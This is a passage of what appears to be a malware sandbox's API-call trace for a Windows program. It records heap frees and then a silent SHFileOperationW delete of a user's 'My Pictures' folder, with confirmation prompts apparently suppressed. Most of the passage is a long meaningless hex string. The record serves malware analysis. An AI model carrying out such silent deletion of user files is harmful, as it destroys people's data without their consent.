lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.673] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpFilePart=0x8bf658*="My Pictures") returned 0x33 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0264.673] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures")) returned 0x2416 [0264.673] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f